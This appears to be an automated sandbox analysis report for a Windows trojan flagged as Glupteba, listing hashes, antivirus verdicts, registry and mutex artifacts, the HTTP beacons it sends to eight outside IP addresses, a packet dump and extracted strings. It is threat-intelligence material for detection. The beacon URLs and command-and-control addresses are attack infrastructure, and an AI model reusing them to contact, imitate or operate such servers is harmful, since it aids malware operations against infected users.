Analysis Date2015-02-14 09:24:59
MD5557b7d170b0dd6343e01de80248e4541
SHA10204f4a6d25073b3508c9dcaefe28754cfdf6e43

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 56953330b2e55776b287fca0d4c4d779 sha1: 6888fd8e2eb7c93b8817b84cad6db86650263800 size: 90112
Section.rdata md5: e1a0370464fb09da6845fe0d6ce7a72b sha1: b9abd3e3684523df7cc564f39af3040f855ec339 size: 20480
Section.data md5: 87d38fc434cda8bf5f49a9cdba886f63 sha1: 158f592ddbe2c25269d0c18c98d0e1abc4216a30 size: 8192
Section.rsrc md5: aff283b1499d9aec9c6c93583bcd1524 sha1: b61a94e315c42f70cfd923bddc2e49af9a84af7a size: 4096
Timestamp2015-01-30 07:51:10
PackerMicrosoft Visual C++ v6.0
PEhashcf71b4a56b4f3964b35f25853347383d48ff9801
IMPhashe045384ace6e985b321c332737d39f64
AV360 Safeno_virus
AVAd-Awareno_virus
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)no_virus
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebError Scanning File
AVEmsisoftno_virus
AVEset (nod32)Win32/Glupteba.M
AVFortinetW32/Glupteba.M!tr
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)Small.GWC
AVIkarusTrojan.Win32.Glupteba
AVK7no_virus
AVKasperskyno_virus
AVMalwareBytesTrojan.Agent
AVMcafeeRDN/Generic.tfr!eh
AVMicrosoft Security EssentialsTrojan:Win32/Carberp.I
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
15150124\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://62.210.217.195:49126/stat?uid=100&downlink=1111&uplink=1111&id=00016F3F&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://85.13.132.233:39353/stat?uid=100&downlink=1111&uplink=1111&id=00018306&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://71.245.120.18:39394/stat?uid=100&downlink=1111&uplink=1111&id=0001969D&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://50.56.53.165:34549/stat?uid=100&downlink=1111&uplink=1111&id=0001AA35&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://159.253.129.110:48439/stat?uid=100&downlink=1111&uplink=1111&id=0001BDDC&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://54.238.54.133:31189/stat?uid=100&downlink=1111&uplink=1111&id=0001D174&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://213.238.168.2:33879/stat?uid=100&downlink=1111&uplink=1111&id=0001E50B&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://217.23.14.191:26195/stat?uid=100&downlink=1111&uplink=1111&id=0001F8A3&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 62.210.217.195:49126
Flows TCP192.168.1.1:1031 ➝ 62.210.217.195:49126
Flows TCP192.168.1.1:1032 ➝ 85.13.132.233:39353
Flows TCP192.168.1.1:1033 ➝ 71.245.120.18:39394
Flows TCP192.168.1.1:1034 ➝ 50.56.53.165:34549
Flows TCP192.168.1.1:1035 ➝ 159.253.129.110:48439
Flows TCP192.168.1.1:1036 ➝ 54.238.54.133:31189
Flows TCP192.168.1.1:1037 ➝ 213.238.168.2:33879
Flows TCP192.168.1.1:1038 ➝ 217.23.14.191:26195

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 46334626 73746174 70617373   0016F3F&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303138 33303626 73746174 70617373   0018306&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303139 36394426 73746174 70617373   001969D&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303141 41333526 73746174 70617373   001AA35&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303142 44444326 73746174 70617373   001BDDC&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 31373426 73746174 70617373   001D174&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303145 35304226 73746174 70617373   001E50B&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303146 38413326 73746174 70617373   001F8A3&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..


Strings
.
B59x TUfu6H8f S86P
Cambria
CJh92058 r73 v1v
CompanyName
CwT6456 LM18 Sx0XSR Q3rnT7g9
cz61 z94
)D1)
E5H0 xTQ3P487 R6A0Sn
e9UYd7ic7
EM0 K7oq9B ik1u94T3 Xx38P
ERj A1c387 B28WwLIc m4qo4
fm8X O7U IAJoD0 gN56n
G4wGDwkw
gA3W65G A92t5Q1 l84df398
h2q9 U62
i2D6D6h lK31R m0YB3 vk0
insideout
instability
interns
investigate
iotas
IqhaL FGnru U5N
(j$.
jbf8O uZ772385
kerosene
kiosk
klick
KPN36G
licenses
lithe
loads
magnetisation
mailshot
microscope
ministrations
MS Sans Serif
N8J4C Xz7N JH251
nanoseconds
ndl c455si4 dT9205yn Vpzuo
neurotic
nk7nMO7 M078CY8 SC87292O E3E
Norman 
o967Iq t57
obliterates
oner
overgrown
p46t
pertains
phrenology
pierced
pizza
poisonings
preens
prelate
process
procrastinator
propping
Q2sB4mzC V9GS bUH20803
RFY5y0
SIMn fL5 qIW11
tlC9cM3u
UL79nmW a4l xfAF9k bvKq4f
uuDw8 GzV2UhC7 nY4is
Verdana
Vk8 k09
VS_VERSION_INFO
wW2se
y2ZM5
Yo618 Z8Z
Z020E08 X19ph s733X2
':#"/(
?'0=<+',
1	'	?57)4$
)2>"/7<"?($
,'	3N!
6*/! #?&:.
\6QTY0^:s;
7:7	($
'"8./&
829	(/
8	(. -7/"/
89?	(04%7/0
9N<2zM
AbortSystemShutdownA
AbortSystemShutdownW
AccessCheckAndAuditAlarmA
_acmdln
AddAccessDeniedAce
AddPrinterDriverExW
AddPrinterDriverW
_adjust_fdiv
ADVAPI32.dll
BuildCommDCBW
BuildTrusteeWithNameA
CallNamedPipeA
CharUpperA
CheckRadioButton
ChooseFontW
ClearCommBreak
CloseDesktop
CloseEventLog
CloseWindowStation
CoInternetCombineUrl
COMCTL32.dll
comdlg32.dll
ConnectNamedPipe
ContinueDebugEvent
_controlfp
CopyRect
CopyStgMedium
CreateAsyncBindCtx
CreateDesktopA
CreateDialogIndirectParamW
CreateEventA
CreateIcon
CreatePrivateObjectSecurity
CreateStdAccessibleObject
CreateUrlCacheEntryA
CreateUrlCacheEntryW
@.data
data_size_ndr
DdeAccessData
DdeGetLastError
DeleteCriticalSection
DeleteUrlCacheEntry
df.;l#
DG{swt
DialogBoxIndirectParamA
DispatchMessageA
DocumentPropertiesA
\E$EZ|a
EnumCalendarInfoW
EnumDesktopsW
EnumPrinterDataA
EnumPrintProcessorsA
EnumWindowStationsA
euiEhI
_except_handler3
~fAC|;
FatalAppExitW
FindAtomW
FindFirstUrlCacheEntryA
FindMediaTypeClass
FindNextFileA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryW
FlatSB_SetScrollInfo
FlushConsoleInputBuffer
FoldStringA
FtpCreateDirectoryA
FtpFindFirstFileW
FtpPutFileA
FtpRemoveDirectoryW
FtpRenameFileA
GdL9)*m
GetClipboardOwner
GetClipCursor
GetCommMask
GetConsoleOutputCP
GetCurrentThread
GetDefaultCommConfigW
GetDialogBaseUnits
GetDiskFreeSpaceExA
GetExplicitEntriesFromAclW
GetIconInfo
GetLocaleInfoW
__getmainargs
GetModuleHandleA
GetModuleHandleW
GetNamedPipeHandleStateA
GetOldestEventLogRecord
GetOpenFileNameA
GetPrivateProfileStringW
GetProfileIntA
GetRoleTextA
GetSidSubAuthorityCount
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadSelectorEntry
GetUrlCacheEntryInfoExA
GetWindowDC
GlobalDeleteAtom
GlobalWire
GopherGetAttributeA
GrayStringA
hRGNxAdFOp
HttpOpenRequestA
HttpSendRequestExW
I=\6~xN
&ICp#>
ImageList_AddMasked
ImageList_Copy
ImageList_DragEnter
ImageList_EndDrag
ImageList_GetDragImage
ImageList_GetIconSize
IMM32.dll
ImmGetContext
InitiateSystemShutdownW
_initterm
InternetAutodial
InternetCombineUrlA
InternetConnectW
InternetFindNextFileA
InternetFindNextFileW
InternetOpenW
InternetSetDialState
I_RpcBindingCopy
I_RpcClearMutex
I_RpcMapWin32Status
IsCharAlphaW
IsCharUpperW
IsDialogMessageW
+-J1O-
KERNEL32.dll
_!L0.NF
LsaEnumerateTrustedDomainsEx
LsaFreeMemory
LsaQueryDomainInformationPolicy
LsaSetTrustedDomainInformation
MapGenericMask
MesEncodeDynBufferHandleCreate
MesIncrementalHandleReset
MessageBoxW
midiInPrepareHeader
mmioSetInfo
mouse_event
Msi.dll
MSVCRT.dll
NdrByteCountPointerFree
NdrClientInitialize
NdrComplexArrayUnmarshall
NdrConformantArrayBufferSize
NdrConformantArrayMemorySize
NdrConformantStringMarshall
NdrConformantStructUnmarshall
NdrEncapsulatedUnionBufferSize
NdrFixedArrayMarshall
NdrMapCommAndFaultStatus
NdrNonEncapsulatedUnionBufferSize
NdrPointerMarshall
NdrRpcSmClientFree
NdrServerCall2
NdrSimpleTypeUnmarshall
NdrStubCall
NdrVaryingArrayMemorySize
NdrXmitOrRepAsBufferSize
)nfI~U
NotifyWinEvent
O-6;<(H
OLEACC.dll
OpenSCManagerW
ox^5t0
__p__commode
__p__fmode
PFoXp\
p*	'\y
*\~QQG
Q+q@SJZG
$r0v/^h
`.rdata
ReadPrinter
RegConnectRegistryW
RegCreateKeyExA
RegReplaceKeyW
ReportEventW
ResUtilGetDwordProperty
ResUtilGetSzValue
RESUTILS.dll
ResUtilSetMultiSzValue
ResUtilSetPropertyTable
ResUtilStopResourceService
RJPUK!
RpcMgmtEpEltInqNextA
RpcMgmtSetCancelTimeout
RpcMgmtStatsVectorFree
RpcNetworkInqProtseqsA
RpcNetworkIsProtseqValidA
RpcRaiseException
RPCRT4.dll
RpcServerInqDefaultPrincNameW
RpcServerListen
RpcServerUseProtseqEpExW
RpcSmEnableAllocate
RpcSmSetClientAllocFree
RpcSmSetThreadHandle
RpcSsAllocate
RpcSsGetThreadHandle
RpcSsSwapClientAllocFree
RpcStringFreeA
__set_app_type
SetMenuItemInfoA
SetPrinterA
SetSecurityDescriptorGroup
SetServiceObjectSecurity
SetSoftwareUpdateAdvertisementState
SetUrlCacheEntryInfoA
SetUrlCacheEntryInfoW
__setusermatherr
short_from_ndr_temp
ShowCaret
sndPlaySoundA
StartServiceCtrlDispatcherW
SUT|K;+b
!This program cannot be run in DOS mode.
tIxy3C
TIZ"fZ
Up;@h\?
urlmon.dll
USER32.dll
UuidCreateNil
UuidEqual
UuidToStringW
`V4(U?
VerInstallFileA
VerLanguageNameW
VERSION.dll
v-i!:.
WindowFromAccessibleObject
WININET.dll
WINMM.dll
WINSPOOL.DRV
_XcptFilter
%{Xd<F
XLiO)o
xQ>:'g
% 'YN,